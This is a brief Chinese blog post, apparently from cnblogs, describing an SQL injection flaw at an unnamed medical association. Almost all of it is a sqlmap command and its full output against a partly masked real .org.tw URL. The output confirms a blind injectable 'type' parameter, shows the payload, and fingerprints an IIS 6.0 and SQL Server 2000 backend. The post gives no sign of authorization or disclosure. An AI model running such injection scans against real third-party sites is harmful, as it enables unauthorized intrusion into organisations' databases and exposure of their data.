• *某医学会sql注入漏洞


    直接上sqlmap神器

    PS C:security toolssqlmap-master> python.exe .sqlmap.py -u "http://www.xxx.org.tw/people/edu.asp?type=6"
             _
     ___ ___| |_____ ___ ___  {1.0.5.46#dev}
    |_ -| . | |     | .'| . |
    |___|_  |_|_|_|_|__,|  _|
          |_|           |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all ap
    d federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 20:17:12
    
    [20:17:12] [INFO] testing connection to the target URL
    [20:17:12] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
    [20:17:13] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
    do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] y
    [20:17:15] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')
    [20:17:15] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
    [20:17:15] [WARNING] WAF/IDS/IPS product hasn't been identified (generic protection response)
    [20:17:15] [INFO] testing if the target URL is stable
    [20:17:16] [INFO] target URL is stable
    [20:17:16] [INFO] testing if GET parameter 'type' is dynamic
    [20:17:17] [INFO] confirming that GET parameter 'type' is dynamic
    [20:17:17] [INFO] GET parameter 'type' is dynamic
    [20:17:17] [INFO] heuristic (basic) test shows that GET parameter 'type' might be injectable (possible DBMS: 'Microsoft SQL Server')
    [20:17:17] [INFO] testing for SQL injection on GET parameter 'type'
    it looks like the back-end DBMS is 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
    for the remaining tests, do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n] 1
    [20:17:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [20:17:27] [INFO] GET parameter 'type' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
    [20:17:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
    [20:17:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
    [20:17:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
    [20:17:27] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
    [20:17:40] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e
    [20:17:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
    [20:17:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [20:17:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [20:17:45] [INFO] checking if the injection point on GET parameter 'type' is a false positive
    [20:17:48] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between
    GET parameter 'type' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
    sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
    ---
    Parameter: type (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: type=6 AND 9449=9449
    ---
    [20:18:04] [INFO] testing Microsoft SQL Server
    [20:18:04] [INFO] confirming Microsoft SQL Server
    [20:18:05] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 2003 or XP
    web application technology: ASP.NET, Microsoft IIS 6.0, ASP
    back-end DBMS: Microsoft SQL Server 2000
    [20:18:05] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 8 times, 404 (Not Found) - 27 times
  • 相关阅读:
    C# 获取枚举 Enum 变量值的 Description 属性
    javascript获取网页URL地址及参数等
    也谈用反射实现Enum→String映射:一种重视性能的方法20090412 21:35一、问题的提出
    LinQ 多表查询
    Windows Service得到当前用户的名字和域
    ASP.NET 部署
    加密解密-C#
    Domino Internet邮件
    C#动态创建表
    读取Excel2000文件
  • 原文地址:https://www.cnblogs.com/janepeak/p/5581959.html
Copyright © 2020-2023  润新知